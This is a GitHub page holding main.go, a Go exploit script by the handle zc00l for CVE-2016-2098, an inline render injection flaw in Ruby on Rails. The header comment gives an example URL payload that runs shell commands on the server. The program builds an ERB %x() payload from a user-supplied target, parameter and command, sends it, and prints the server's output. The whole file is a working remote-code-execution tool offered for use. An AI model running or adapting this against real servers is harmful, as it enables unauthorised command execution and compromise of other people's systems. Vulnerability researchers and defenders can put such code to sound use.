-
Notifications
You must be signed in to change notification settings - Fork 4
/
main.go
61 lines (49 loc) · 1.86 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
package main
/*
*****************************************
CVE-2016-2098 - RubyOnrails Vulnerability
*****************************************
This vulnerability lies in the way Ruby-On-Rails handles the function render() to generate web-content.
You can exploit this function to get remote code execution by supplying inline to a vulnerable parameter.
Example:
http://vulnerable.lan/pages?id=1
To attack the following url you might use:
http://vulnerable.lan/pages?id[inline]=<%25= %25x(SHELLCOMMANDHERE) %25>
This would cause SHELLCOMMANDHERE to be executed in the remote server at shell level.
This exploit script was written by zc00l at 09/02/2018 - 13:42
This code is authored by ANDRE LUIS ALBINO DE MORAES MARQUES - @zc00l - [email protected]
*/
import (
"fmt"
"net/http"
"net/url"
"flag"
"io/ioutil"
"os"
)
var target = flag.String("target", "", "Vulnerable web-server page")
var parameter = flag.String("parameter", "", "Vulnerable parameter")
var command = flag.String("command", "id", "Command to be executed in the remote target")
func exploit(url string) {
resp, err := http.Get(url)
if err != nil {
fmt.Printf("\033[091m[!]\033[0m Error sending request: %s\n", err)
os.Exit(1)
}
defer resp.Body.Close()
content, err := ioutil.ReadAll(resp.Body)
println(string(content))
}
func header() {
fmt.Printf("zc00l exploit to get RCE in CVE-2016-2098\n")
}
func main() {
header()
flag.Parse()
println("\033[092m[+]\033[0m Vulnerable page set to: ", *target)
println("\033[092m[+]\033[0m Vulnerable parameter set to: ", *parameter)
println("\033[092m[+]\033[0m Command to be executed: ", *command)
var payload = url.PathEscape("[inline]=<%= %x("+*command+") %>")
var exploit_url = fmt.Sprintf("%s?%s%s", *target, *parameter, payload)
exploit(exploit_url)
}